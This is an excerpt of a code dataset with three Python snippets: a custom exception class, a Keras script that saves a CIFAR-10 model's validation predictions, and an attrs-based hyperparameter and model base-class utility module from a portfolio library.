171411 | class BadStatusException(Exception):
pass | StarcoderdataPython |
5185690 | <reponame>nchlis/CIFAR10_CAM<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu May 9 15:53:01 2019
@author: N.Chlis
"""
from keras.models import load_model
import numpy as np
from keras.datasets import cifar10
(X_tr, y_tr), (X_val, y_val) = cifar10.load_data()
#normalize input images to [0,1]
X_tr=X_tr/2**8
X_val=X_val/2**8
model = load_model('CNN_CAM_128_256.hdf5')
#get predicted labels for the validation set
y_val_hat = model.predict(X_val)
np.save('CNN_CAM_128_256_y_val_hat.npy',y_val_hat)
| StarcoderdataPython |
8164296 | <filename>garpar/utils/mabc.py
import attr
from abc import ABCMeta, abstractmethod # noqa
HPARAM_METADATA_FLAG = "__hparam__"
MPROPERTY_METADATA_FLAG = "__mproperty__"
MODEL_CONFIG = "__model_cls_config__"
def hparam(default, **kwargs):
"""Create a hyper parameter for market maker.
By design decision, hyper-parameter is required to have a sensitive default
value.
Parameters
----------
default :
Sensitive default value of the hyper-parameter.
**kwargs :
Additional keyword arguments are passed and are documented in
``attr.ib()``.
Return
------
Hyper parameter with a default value.
Notes
-----
This function is a thin-wrapper over the attrs function ``attr.ib()``.
"""
metadata = kwargs.pop("metadata", {})
metadata[HPARAM_METADATA_FLAG] = True
return attr.ib(default, metadata=metadata, kw_only=True, **kwargs)
def mproperty(**kwargs):
"""Create a hyper parameter for market maker.
By design decision, hyper-parameter is required to have a sensitive default
value.
Parameters
----------
default :
Sensitive default value of the hyper-parameter.
**kwargs :
Additional keyword arguments are passed and are documented in
``attr.ib()``.
Return
------
Hyper parameter with a default value.
Notes
-----
This function is a thin-wrapper over the attrs function ``attr.ib()``.
"""
metadata = kwargs.pop("metadata", {})
metadata[MPROPERTY_METADATA_FLAG] = True
return attr.ib(init=False, metadata=metadata, **kwargs)
@attr.s(repr=False)
class ModelABC(metaclass=ABCMeta):
__model_cls_config__ = {"repr": False, "frozen": True}
def __init_subclass__(cls):
"""Initiate of subclasses.
It ensures that every inherited class is decorated by ``attr.s()`` and
assigns as class configuration the parameters defined in the class
variable `__portfolio_maker_cls_config__`.
In other words it is slightly equivalent to:
.. code-block:: python
@attr.s(**PortfolioMakerABC.__portfolio_maker_cls_config__)
class Decomposer(PortfolioMakerABC):
pass
"""
model_config = getattr(cls, MODEL_CONFIG)
return attr.s(maybe_cls=cls, **model_config)
def __repr__(self):
"""x.__repr__() <==> repr(x)."""
clsname = type(self).__name__
selfd = attr.asdict(
self,
recurse=False,
filter=lambda attr, _: attr.repr,
)
hparams = sorted(selfd.items())
attrs_str = ", ".join([f"{k}={repr(v)}" for k, v in hparams])
return f"{clsname}({attrs_str})"
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.